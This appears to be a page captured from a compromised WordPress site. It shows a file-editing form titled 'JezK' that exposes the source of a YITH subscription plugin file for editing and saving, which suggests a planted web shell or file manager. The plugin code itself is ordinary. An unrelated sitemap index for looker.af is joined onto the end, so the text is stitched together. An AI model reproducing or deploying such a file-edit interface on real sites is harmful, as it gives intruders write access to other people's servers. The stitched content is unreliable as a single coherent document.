
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: class-ywsbs-subscription-shortcodes.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * YWSBS_Subscription_Shortcode set all plugin shortcodes
 *
 * @class   YWSBS_Subscription_Shortcodes
 * @since   2.0.0
 * @author  YITH
 * @package YITH\Subscription
 */

defined( &#039;YITH_YWSBS_INIT&#039; ) || exit; // Exit if accessed directly.


if ( ! class_exists( &#039;YWSBS_Subscription_Shortcodes&#039; ) ) {
	/**
	 * Implements the YWSBS_Subscription_Shortcodes class.
	 *
	 * @class   YWSBS_Subscription_Shortcodes
	 * @package YITH\Subscription
	 * @since   2.0.0
	 */
	class YWSBS_Subscription_Shortcodes {

		/**
		 * Constructor for the shortcode class
		 */
		public function __construct() {
			add_shortcode( &#039;ywsbs_my_account_subscriptions&#039;, array( __CLASS__, &#039;my_account_subscriptions_shortcode&#039; ) );
		}

		/**
		 * Add subscription section on my-account page
		 *
		 * @param array $atts Attributes.
		 * @return  string
		 * @since   1.0.0
		 */
		public static function my_account_subscriptions_shortcode( $atts ) {

			$args = shortcode_atts(
				array(
					&#039;page&#039; =&gt; 1,
				),
				$atts
			);

			$all_subs      = YWSBS_Subscription_Helper()-&gt;get_subscriptions_by_user( get_current_user_id(), -1 );
			$max_pages     = ceil( count( $all_subs ) / 10 );
			$subscriptions = YWSBS_Subscription_Helper()-&gt;get_subscriptions_by_user( get_current_user_id(), $args[&#039;page&#039;] );
			ob_start();
			wc_get_template(
				&#039;myaccount/my-subscriptions-view.php&#039;,
				array(
					&#039;subscriptions&#039; =&gt; $subscriptions,
					&#039;max_pages&#039;     =&gt; $max_pages,
					&#039;current_page&#039;  =&gt; $args[&#039;page&#039;],
				),
				&#039;&#039;,
				YITH_YWSBS_TEMPLATE_PATH . &#039;/&#039;
			);
			return ob_get_clean();
		}
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
